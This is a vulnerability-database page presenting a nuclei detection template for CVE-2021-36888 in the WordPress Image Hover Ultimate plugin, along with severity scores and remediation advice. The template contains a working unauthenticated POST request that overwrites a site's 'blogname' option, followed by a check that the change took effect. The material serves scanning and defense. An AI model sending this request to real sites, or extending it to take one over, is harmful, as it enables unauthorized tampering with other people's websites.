Lucene search
+L

WordPress Image Hover Ultimate - Unauthenticated Settings Update

🗓️ 09 Sep 2026 02:52:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Unauthenticated options update in WordPress Image Hover Ultimate <=9.6.1 leads to site compromise.

Related
Refs
Code
id: CVE-2021-36888

info:
  name: WordPress Image Hover Ultimate - Unauthenticated Settings Update
  author: riteshs4hu
  severity: critical
  description: |
    Unauthenticated Arbitrary Options Update vulnerability leading to full website compromise discovered in Image Hover Effects Ultimate (versions <= 9.6.1) WordPress plugin.
  impact: |
    Attackers can fully compromise the website, leading to complete control and potential data theft or defacement.
  remediation: |
    Update to the latest version of the plugin, newer than 9.6.1.
  reference:
    - https://wpscan.com/vulnerability/75da4102-7063-407f-975e-28be6ed33aac/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36888
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36888
    epss-score: 0.06685
    epss-percentile: 0.9346
    cwe-id: CWE-284
    cpe: cpe:2.3:a:blocksera:image_hover_effects:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2021,wpscan,wp-plugin,wordpress,imagehover,intrusive,unauth,vkev,vuln

variables:
  rand: "{{randstr}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{rand}}%22%7D

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "oxi-confirmation-success")'
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, rand)"
        condition: and
# digest: 4a0a00473045022035aaf4316b459600a4c1f4834735e0dc7a54a9f3bf2b5e6c5025df50f39bc71402210098c4e47532df17e47177f9cffc6662ef1ee1b3aa26a539a5e5f7be33ca817e65:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Nov 2025 19:45Current
8High risk
Vulners AI Score8
CVSS 27.5
CVSS 3.19.8
EPSS0.06685
SSVC
28